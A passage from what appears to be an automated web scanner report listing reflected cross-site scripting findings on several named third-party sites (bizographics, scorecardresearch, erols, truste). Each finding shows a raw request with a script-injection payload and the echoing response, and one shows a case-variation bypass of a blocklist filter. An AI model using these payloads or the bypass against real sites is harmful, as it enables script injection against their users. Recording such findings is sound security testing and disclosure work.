The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 11cb4<script>alert(1)</script>ed63ed5aa3e was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a511cb4<script>alert(1)</script>ed63ed5aa3e&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=253%26sei=21%26sci=1%26sai=0%26smi=0%26pbi=0%26sts=1311016306513388%26sui=e01db2f2-208a-43e5-beec-a78df4693afe HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: BizoID=5be7e821-bd7b-4aa8-a2f3-d2cf3d37da97; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KUzMoRYIoxo1aj5XcunNcMDa7Re6IGD4lGZEeNQ8mRkAAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRwjRSjipLT3XS88yEBf0YisuEVUJBxdqAyBFVoPj6MdhlvP6Q090K7EBPXImH5HzDNYipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie; BizoNetworkPartnerIndex=11

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 18 Jul 2011 19:17:05 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a511cb4<script>alert(1)</script>ed63ed5aa3e)

3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 9418c<script>alert(1)</script>c4c121c8b4e was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=9418c<script>alert(1)</script>c4c121c8b4e HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: BizoID=5be7e821-bd7b-4aa8-a2f3-d2cf3d37da97; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KUzMoRYIoxo1aj5XcunNcMDa7Re6IGD4lGZEeNQ8mRkAAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRwjRSjipLT3XS88yEBf0YisuEVUJBxdqAyBFVoPj6MdhlvP6Q090K7EBPXImH5HzDNYipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie; BizoNetworkPartnerIndex=11

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 18 Jul 2011 19:17:16 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 9418c<script>alert(1)</script>c4c121c8b4e

3.11. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload fa22f<script>alert(1)</script>6e58205a0cf was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8fa22f<script>alert(1)</script>6e58205a0cf&c2=6036211&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:40 GMT
Date: Mon, 18 Jul 2011 19:11:40 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8fa22f<script>alert(1)</script>6e58205a0cf", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.12. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 657a5<script>alert(1)</script>d4b430af5db was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=657a5<script>alert(1)</script>d4b430af5db HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:43 GMT
Date: Mon, 18 Jul 2011 19:11:43 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"657a5<script>alert(1)</script>d4b430af5db", c15:"", c16:"", r:""});



3.13. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b83e4<script>alert(1)</script>9c3bbb2c538 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211b83e4<script>alert(1)</script>9c3bbb2c538&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:41 GMT
Date: Mon, 18 Jul 2011 19:11:41 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211b83e4<script>alert(1)</script>9c3bbb2c538", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.14. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2ee04<script>alert(1)</script>178a92e0c0a was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=2ee04<script>alert(1)</script>178a92e0c0a&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:41 GMT
Date: Mon, 18 Jul 2011 19:11:41 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"2ee04<script>alert(1)</script>178a92e0c0a", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.15. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 8abc0<script>alert(1)</script>331f5ae8f30 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=8abc0<script>alert(1)</script>331f5ae8f30&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:42 GMT
Date: Mon, 18 Jul 2011 19:11:42 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"8abc0<script>alert(1)</script>331f5ae8f30", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.16. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ad9d9<script>alert(1)</script>a40c8ea54bb was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=ad9d9<script>alert(1)</script>a40c8ea54bb&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:42 GMT
Date: Mon, 18 Jul 2011 19:11:42 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"ad9d9<script>alert(1)</script>a40c8ea54bb", c6:"", c10:"", c15:"", c16:"", r:""});



3.17. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e2bc3<script>alert(1)</script>b8ff09a0d87 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=e2bc3<script>alert(1)</script>b8ff09a0d87&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:43 GMT
Date: Mon, 18 Jul 2011 19:11:43 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"e2bc3<script>alert(1)</script>b8ff09a0d87", c10:"", c15:"", c16:"", r:""});



3.18. http://cgibin.erols.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57d8c<script>alert(1)</script>80cbe202f74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico57d8c<script>alert(1)</script>80cbe202f74 HTTP/1.1
Host: cgibin.erols.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:20:57 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html
Content-Length: 320

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico57d8c<script>alert(1)</script>80cbe202f74 was not found on this server.<P>
...[SNIP]...

3.19. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload af98e<script>alert(1)</script>44657fdf20a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziringaf98e<script>alert(1)</script>44657fdf20a/cgi-bin/nsgate/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:28 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziringaf98e<script>alert(1)</script>44657fdf20a/cgi-bin/nsgate/gate.pl was not found on this server.<P>
...[SNIP]...

3.20. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36894<script>alert(1)</script>b3fd1e87874 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin36894<script>alert(1)</script>b3fd1e87874/nsgate/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:29 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin36894<script>alert(1)</script>b3fd1e87874/nsgate/gate.pl was not found on this server.<P>
...[SNIP]...

3.21. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f324a<script>alert(1)</script>edcfd067e35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgatef324a<script>alert(1)</script>edcfd067e35/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:30 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin/nsgatef324a<script>alert(1)</script>edcfd067e35/gate.pl was not found on this server.<P>
...[SNIP]...

3.22. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8e515<script>alert(1)</script>5341abcd9af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgate/gate.pl8e515<script>alert(1)</script>5341abcd9af HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:33 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin/nsgate/gate.pl8e515<script>alert(1)</script>5341abcd9af was not found on this server.<P>
...[SNIP]...

3.23. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49c6f"><script>alert(1)</script>c05ff7c7c01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgate/gate.pl?49c6f"><script>alert(1)</script>c05ff7c7c01=1 HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 18 Jul 2011 02:16:12 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 3.2//EN">
<!-- Template top.phtml -->
<HTML>
<head>
<TITLE>Super DNS Lookup Gateway
</TITLE>
<META Name="author" Content="Neal Ziring">
<META Name="keyw
...[SNIP]...
<form method="get" action="/ziring/cgi-bin/nsgate/gate.pl?49c6f"><script>alert(1)</script>c05ff7c7c01=1" enctype="application/x-www-form-urlencoded">
...[SNIP]...

3.24. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 51b45<script>alert(1)</script>2093950a9e2 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont151b45<script>alert(1)</script>2093950a9e2&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334320592/direct;wi.300;hi.250/01/6388366403?click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001040499/cstr=60538233=_4e248527,6388366403,783329^1040499^1183^0,1_/xsxdata=$XSXDATA/bnum=60538233/optn=64?trg=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:11:56 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 7359

if (typeof truste == "undefined" || !truste) {

window.log=function(){log.history=log.history||[];log.history.push(arguments);if(this.console){console.log(Array.prototype.slice.call(arguments))}};
...[SNIP]...
seName] = bindings;
   };
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   };

   var te_clr1_att01cont151b45<script>alert(1)</script>2093950a9e2_ib = '<div id="te-clr1-att01cont151b45<script>
...[SNIP]...

3.25. http://choices.truste.com/ca [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload df5d5<ScRiPt>alert(1)</ScRiPt>e9bb056ed84 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250df5d5<ScRiPt>alert(1)</ScRiPt>e9bb056ed84&c=att01cont1&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
